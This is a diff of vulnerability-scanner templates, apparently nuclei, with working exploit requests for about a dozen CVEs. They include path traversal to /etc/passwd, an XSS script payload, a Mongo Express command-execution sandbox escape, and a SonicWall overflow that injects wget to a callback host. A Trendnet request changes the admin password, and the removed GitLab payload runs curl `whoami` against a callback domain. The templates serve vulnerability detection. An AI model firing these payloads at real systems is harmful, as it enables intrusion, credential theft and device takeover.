-        part: header
 
       - type: status
         status:

cves/2020/CVE-2020-14882.yaml

@@ -6,17 +6,12 @@ info:
   severity: critical
   reference:
     - https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
+    - https://www.oracle.com/security-alerts/cpuoct2020.html
     - https://twitter.com/jas502n/status/1321416053050667009
     - https://youtu.be/JFVDOIL0YtA
     - https://github.com/jas502n/CVE-2020-14882#eg
-  description: |
+  description: An easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.
-    Vulnerability in the Oracle WebLogic Server
+  remediation: Apply the appropriate security update.
-    product of Oracle Fusion Middleware (component: Console).
-    Supported versions that are affected are 10.3.6.0.0,
-    12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.
-    Easily exploitable vulnerability allows unauthenticated
-    attacker with network access via HTTP to compromise the server.
-    Successful attacks of this vulnerability can result in takeover.
   tags: cve,cve2020,oracle,rce,weblogic,oast
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
@@ -43,4 +38,5 @@ requests:
       - type: word
         part: interactsh_protocol
         words:
-          - "http"
+          - "http"
+# Enhanced by mp on 2022/02/08

cves/2020/CVE-2020-18268.yaml

@@ -0,0 +1,38 @@
+id: CVE-2020-18268
+
+info:
+  name: Z-BlogPHP 1.5.2 Open redirect
+  author: 0x_Akoko
+  severity: medium
+  description: Open Redirect in Z-BlogPHP v1.5.2 and earlier allows remote attackers to obtain sensitive information via the "redirect" parameter in the component "zb_system/cmd.php."
+  reference:
+    - https://github.com/zblogcn/zblogphp/issues/216
+    - https://www.cvedetails.com/cve/CVE-2020-18268
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2020-18268
+    cwe-id: CWE-601
+  tags: cve,cve2020,redirect,zblogphp,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /zb_system/cmd.php?act=verify HTTP/1.1
+        Host: {{Hostname}}
+        Content-Length: 81
+        Content-Type: application/x-www-form-urlencoded
+        Connection: close
+
+        btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0
+
+      - |
+        GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/2
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

cves/2020/CVE-2020-23575.yaml

@@ -0,0 +1,35 @@
+id: CVE-2020-23575
+
+info:
+  name: Kyocera Printer d-COPIA253MF - Directory Traversal
+  author: 0x_Akoko
+  severity: high
+  description: A directory traversal vulnerability exists in Kyocera Printer d-COPIA253MF plus. Successful exploitation of this vulnerability could allow an attacker to retrieve or view arbitrary files from the affected server.
+  reference:
+    - https://www.exploit-db.com/exploits/48561
+    - https://www.cvedetails.com/cve/CVE-2020-23575
+    - https://www.kyoceradocumentsolutions.com.tr/tr.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2020-23575
+    cwe-id: CWE-22
+  tags: cve,cve2020,printer,iot,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "root:.*:0:0"
+          - "bin:.*:1:1"
+        condition: or
+
+      - type: status
+        status:
+          - 200

cves/2020/CVE-2020-24186.yaml

@@ -4,7 +4,7 @@ info:
   name: Unauthenticated File upload wpDiscuz WordPress plugin RCE
   author: Ganofins
   severity: critical
-  description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server.
+  description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.
   reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
   tags: cve,cve2020,wordpress,wp-plugin,rce,upload
   classification:

cves/2020/CVE-2020-24391.yaml

@@ -0,0 +1,51 @@
+id: CVE-2020-24391
+
+info:
+  name: Mongo Express Remote Code Execution
+  author: leovalcante
+  severity: critical
+  description: Mongo-express uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to RCE in the context of the node server.
+  reference:
+    - https://securitylab.github.com/advisories/GHSL-2020-131-mongo-express/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-24391
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2020-24391
+  tags: cve,cve2020,mongo,express,rce,intrusive
+
+
+requests:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /checkValid HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++
+
+      - |
+        GET /public/css/{{randstr}}.css HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body_3
+        regex:
+          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        regex:
+          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"

cves/2020/CVE-2020-35489.yaml

@@ -29,9 +29,9 @@ requests:
           - "Contact Form 7"
         part: body
 
-      - type: regex
+      - type: word
-        regex:
+        words:
-          - '^== Changelog =="'
+          - '== Changelog =='
         part: body
 
       - type: regex

cves/2020/CVE-2020-35749.yaml

@@ -0,0 +1,40 @@
+id: CVE-2020-35749
+
+info:
+  name: Simple Job Board < 2.9.4 - Authenticated Path Traversal Leading to Arbitrary File Download
+  author: cckuailong
+  severity: high
+  description: The plugin does not validate the sjb_file parameter when viewing a resume, allowing authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via a path traversal attack.
+  reference:
+    - https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-35749
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 7.7
+    cve-id: CVE-2020-35749
+    cwe-id: CWE-22
+  tags: cve,cve2020,lfi,wp,wordpress,wp-plugin,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+      - |
+        GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200

cves/2020/CVE-2020-36365.yaml

@@ -0,0 +1,31 @@
+id: CVE-2020-36365
+
+info:
+  name: Smartstore < 4.1.0 - Open redirect
+  author: 0x_Akoko
+  severity: medium
+  description: Smartstore (aka SmartStoreNET) before 4.1.0 allows CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit open redirect.
+  reference:
+    - https://github.com/smartstore/SmartStoreNET/issues/2113
+    - https://www.cvedetails.com/cve/CVE-2020-36365
+    - https://github.com/smartstore/SmartStoreNET
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2020-36365
+    cwe-id: CWE-601
+  metadata:
+    shodan-query: http.html:'content="Smartstore'
+  tags: cve,cve2020,redirect,smartstore
+
+requests:
+  - method: GET
+
+    path:
+      - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com'
+
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

cves/2020/CVE-2020-8813.yaml

@@ -4,7 +4,7 @@ info:
   name: Cacti v1.2.8 - Unauthenticated Remote Code Execution
   author: gy741
   severity: high
-  description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability
+  description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability.
   reference:
     - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
   tags: cve,cve2020,cacti,rce,oast

cves/2020/CVE-2020-9402.yaml

@@ -2,8 +2,10 @@ id: CVE-2020-9402
 
 info:
   name: Django SQL Injection
-  description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL.
+  description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL.
+  remediation: Upgrade to the latest version.
   reference:
+    - https://www.debian.org/security/2020/dsa-4705
     - https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402
     - https://docs.djangoproject.com/en/3.0/releases/security/
     - https://nvd.nist.gov/vuln/detail/CVE-2020-9402
@@ -29,3 +31,5 @@ requests:
           - "ORA-06512:"
           - "Request Method:"
         condition: and
+
+# Enhanced by mp on 2022/02/04

cves/2021/CVE-2021-20038.yaml

@@ -0,0 +1,42 @@
+id: CVE-2021-20038
+
+info:
+  name: SonicWall SMA100 Stack BoF to Unauthenticated RCE
+  author: dwisiswant0, jbaines-r7
+  severity: critical
+  description: |
+    A Stack-based buffer overflow vulnerability in SMA100
+    Apache httpd server's mod_cgi module environment variables
+    allows a remote unauthenticated attacker to potentially
+    execute code as a 'nobody' user in the appliance.
+    This vulnerability affected SMA 200, 210, 400, 410 and 500v
+    appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv,
+    10.2.1.2-24sv and earlier versions.
+  reference:
+    - https://attackerkb.com/topics/QyXRC1wbvC/cve-2021-20038/rapid7-analysis
+  tags: cve,cve2021,overflow,rce,sonicwall
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2021-20038
+    cwe-id: CWE-787
+
+requests:
+  - raw:
+      - |
+        GET /{{prefix_addr}}{{system_addr}};{wget,http://{{interactsh-url}}};{{prefix_addr}}{{system_addr}};{wget,http://{{interactsh-url}}};?{{repeat("A", 518)}} HTTP/1.1
+        Host: {{Hostname}}
+
+    attack: clusterbomb
+    payloads:
+      prefix_addr:
+        - "%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf" # stack's top address
+      system_addr:
+        - "%08%b7%06%08" # for 10.2.1.2-24sv
+        - "%64%b8%06%08" # for 10.2.1.1-1[79]sv
+
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the HTTP Interaction
+        words:
+          - "http"

cves/2021/CVE-2021-20150.yaml

@@ -0,0 +1,54 @@
+id: CVE-2021-20150
+
+info:
+  name: Trendnet AC2600 TEW-827DRU - Credentials Disclosure
+  author: gy741
+  severity: medium
+  description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. Authentication can be bypassed and a user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.
+  reference:
+    - https://www.tenable.com/security/research/tra-2021-54
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-20150
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 5.30
+    cve-id: CVE-2021-20150
+    cwe-id: CWE-287
+  metadata:
+    shodan-query: http.html:"TEW-827DRU"
+  tags: cve,cve2021,trendnet,disclosure,router
+
+requests:
+  - raw:
+      - |
+        POST /apply_sec.cgi HTTP/1.1
+        Host: {{Hostname}}
+
+        action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - 'ftp_username'
+          - 'ftp_password'
+          - 'ftp_permission'
+          - 'TEW-827DRU'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+    extractors:
+      - type: regex
+        part: body
+        name: password
+        group: 1
+        regex:
+          - '<input name="admin_passwd" type="password" id="admin_passwd" size="20" maxlength="15" value ="(.*)" />'

cves/2021/CVE-2021-20158.yaml

@@ -0,0 +1,51 @@
+id: CVE-2021-20158
+
+info:
+  name: Trendnet AC2600 TEW-827DRU - Unauthenticated Admin Password change
+  author: gy741
+  severity: critical
+  description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicous actor to force the change of the admin password due to a hidden administrative command.
+  reference:
+    - https://www.tenable.com/security/research/tra-2021-54
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-20150
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2021-20158
+    cwe-id: CWE-287
+  metadata:
+    shodan-query: http.html:"TEW-827DRU"
+  tags: cve,cve2021,trendnet,disclosure,router,intrusive,dos
+
+requests:
+  - raw:
+      - |
+        POST /apply_sec.cgi HTTP/1.1
+        Host: {{Hostname}}
+
+        ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei
+      - |
+        POST /apply_sec.cgi HTTP/1.1
+        Host: {{Hostname}}
+
+        html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=bnVjbGVp&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - 'setConnectDevice'
+          - 'setInternet'
+          - 'setWlanSSID'
+          - 'TEW-827DRU'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"

cves/2021/CVE-2021-20792.yaml

@@ -0,0 +1,48 @@
+id: CVE-2021-20792
+
+info:
+  name: Quiz And Survey Master < 7.1.14 - Reflected Cross-Site Scripting
+  author: dhiyaneshDK
+  severity: medium
+  description: Cross-site scripting vulnerability in Quiz And Survey Master versions prior to 7.1.14 allows a remote attacker to inject arbitrary script via unspecified vectors."
+  reference:
+    - https://wpscan.com/vulnerability/4deb3464-00ed-483b-8d91-f9dffe2d57cf
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-20792
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2021-20792
+    cwe-id: CWE-79
+  tags: wordpress,cve,cve2021,wp-plugin,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        GET /wp-admin/admin.php?page=mlw_quiz_list&s="></script><script>alert(document.domain)</script>&paged="></script><script>alert(document.domain)</script> HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '</script><script>alert(document.domain)</script>'
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "text/html"

cves/2021/CVE-2021-21973.yaml

@@ -0,0 +1,38 @@
+id: CVE-2021-21973
+
+info:
+  name: VMware vCenter Unauthenticated SSRF
+  author: pdteam
+  severity: medium
+  description: The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-21973
+    - https://twitter.com/osama_hroot/status/1365586206982082560
+    - https://twitter.com/bytehx343/status/1486582542807420928
+  tags: cve,cve2021,vmware,ssrf,vcenter,oast
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.30
+    cve-id: CVE-2021-21973
+    cwe-id: CWE-918
+
+requests:
+  - raw:
+      - |
+        GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1
+        Host: {{Hostname}}
+        Vcip: {{interactsh-url}}
+        Vcpassword: {{rand_base(6)}}
+        Vcusername: {{rand_base(6)}}
+        Reqresource: {{rand_base(6)}}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 500
+
+      - type: word
+        part: body
+        words:
+          - "The server sent HTTP status code 200"

cves/2021/CVE-2021-22205.yaml

@@ -1,63 +1,128 @@
 id: CVE-2021-22205
 
 info:
-  name: GitLab CE/EE Unauthenticated RCE using ExifTool
+  name: Fingerprinting GitLab CE/EE Unauthenticated RCE using ExifTool - Passive Detection
-  author: pdteam
+  author: GitLab Red Team
   severity: critical
-  description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
+  description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.  This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-<hash>.css file in the header for unauthenticated requests.  Positive matches do not guarantee exploitability.  Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.
   reference:
+    - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-research/cve-2021-22205-hash-generator
+    - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-operations/-/issues/196
+    - https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json
+    - https://censys.io/blog/cve-2021-22205-it-was-a-gitlab-smash/
     - https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
     - https://hackerone.com/reports/1154542
     - https://nvd.nist.gov/vuln/detail/CVE-2021-22205
-  tags: cve,cve2021,gitlab,rce,oast
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 9.90
     cve-id: CVE-2021-22205
     cwe-id: CWE-20
+  tags: cve,cve2021,gitlab,rce
 
 requests:
-  - raw:
+  - method: GET
-      - |
+    path:
-        GET /users/sign_in HTTP/1.1
+      - "{{BaseURL}}/users/sign_in"
-        Host: {{Hostname}}
-        Origin: {{BaseURL}}
 
-      - |
+    redirects: true
-        POST /uploads/user HTTP/1.1
+    max-redirects: 3
-        Host: {{Hostname}}
-        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
-        X-CSRF-Token: {{csrf-token}}
-
-        {{hex_decode('0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B2066696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A7065670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFFDEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F4247343400000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F7079726967687420225C0A22202E2071787B')}}curl `whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}}
-
-    cookie-reuse: true
-    matchers-condition: and
     matchers:
       - type: word
         words:
-          - 'Failed to process image'
+          - "015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df"
-
+          - "02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b"
-      - type: word
+          - "051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce"
-        part: interactsh_protocol  # Confirms the DNS Interaction
+          - "08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290"
-        words:
+          - "0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59"
-          - "dns"
+          - "0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753"
-
+          - "1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f"
-      - type: status
+          - "14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4"
-        status:
+          - "1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4"
-          - 422
+          - "20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6"
+          - "27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959"
+          - "292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369"
+          - "2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae"
+          - "30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f"
+          - "318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2"
+          - "33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1"
+          - "335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac"
+          - "34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86"
+          - "3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087"
+          - "340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86"
+          - "38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d"
+          - "3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd"
+          - "39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514"
+          - "39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09"
+          - "3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e"
+          - "3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb"
+          - "40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3"
+          - "4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1"
+          - "450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54"
+          - "455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8"
+          - "4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b"
+          - "45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44"
+          - "473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117"
+          - "4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2"
+          - "4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e"
+          - "4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160"
+          - "504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb"
+          - "52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c"
+          - "530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf"
+          - "5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71"
+          - "62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51"
+          - "64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a"
+          - "655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f"
+          - "67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2"
+          - "69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca"
+          - "6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb"
+          - "70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b"
+          - "7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5"
+          - "73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d"
+          - "77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f"
+          - "78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab"
+          - "79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9"
+          - "7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9"
+          - "7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5"
+          - "81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3"
+          - "83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1"
+          - "93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b"
+          - "969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e"
+          - "9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b"
+          - "9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e"
+          - "a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528"
+          - "a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9"
+          - "ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5"
+          - "ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8"
+          - "aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b"
+          - "b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711"
+          - "b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445"
+          - "bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca"
+          - "be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a"
+          - "bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7"
+          - "bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4"
+          - "bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218"
+          - "c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4"
+          - "c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c"
+          - "d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71"
